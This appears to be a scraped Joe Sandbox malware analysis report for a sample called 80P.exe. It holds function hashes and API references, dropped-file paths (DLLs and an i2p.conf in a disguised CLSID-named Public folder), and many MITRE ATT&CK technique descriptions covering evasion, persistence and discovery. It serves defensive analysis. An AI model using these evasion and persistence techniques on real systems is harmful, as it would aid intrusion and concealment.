Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 87b6c94d0ed7976fff14a7d71f92632dcef419059c189e4e18e4384b6916525e
Instruction ID: 05afc105acb2a7ffdcb2c2f3867743b1224ab139caf225a7f77e48cc8f81f123
Opcode Fuzzy Hash: 87b6c94d0ed7976fff14a7d71f92632dcef419059c189e4e18e4384b6916525e
Instruction Fuzzy Hash: A3E04851A0CE06C9F510EB56FC001BD6614FFA07B4F4441B5DD6F67672DE2CD5959308

Function 00007FFE133084B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE13308567

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13308587
registry_del_value, xrefs: 00007FFE13308580

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 66301cae53ed6fb6f16d0c6ae6d16061bb5fa13e113b6ba7e4e88adf1e5741c8
Instruction ID: c4cbbcb5167ebd16e20b35589be7784f7af5a6ea5380ff74ae0f23685566ff4c
Opcode Fuzzy Hash: 66301cae53ed6fb6f16d0c6ae6d16061bb5fa13e113b6ba7e4e88adf1e5741c8
Instruction Fuzzy Hash: 29E01A61A0CE0AC9E510AB56BC001BD2614FBA07B5F4441B5DE6E6A6B2DE2CE9959208

Function 00007FFE133084C1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE13308567

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13308587
registry_del_value, xrefs: 00007FFE13308580

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: d9df53aad19027ec51dc863d790e8a0bc8c701a7099ce9e4ddea8cecc354396c
Instruction ID: b1e8c65eb8d7b67b87db75e00d270adc17de741341ae469ab5fbc8d2d6b25e33
Opcode Fuzzy Hash: d9df53aad19027ec51dc863d790e8a0bc8c701a7099ce9e4ddea8cecc354396c
Instruction Fuzzy Hash: 95E04F61A0CE0AC9F510AB56FC002BD2614FFA07B4F4441B5DE6E6B6B2DE2CE5999308

Function 00007FFE11508B20 Relevance: 5.1, APIs: 4, Instructions: 82stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE11508B5B
strcmp.MSVCRT ref: 00007FFE11508B73
strcmp.MSVCRT ref: 00007FFE11508BA6
strcmp.MSVCRT ref: 00007FFE11508BC7

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: 23f4059f3eec6cc7d22a5bfeff849bc8b5d19bf497d60b10d2290aa525ec140d
Instruction ID: ebc1d4ae55fc49fe34f1a85a0ce1953dd731c25e80dc48cd4afa26a64d8c7bf5
Opcode Fuzzy Hash: 23f4059f3eec6cc7d22a5bfeff849bc8b5d19bf497d60b10d2290aa525ec140d
Instruction Fuzzy Hash: BE212A95F0DE468AFB695C938580B7E5199AF08BE0E1C40B9CE0D4B7F6DE5CE8819341

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 80P.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_1d12cab9-8df1-4b73-ab59-8d57e46c430f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E32.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F3C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F5D.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F6A.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3FC9.tmp.txt

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.conf

Windows Analysis Report
80P.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre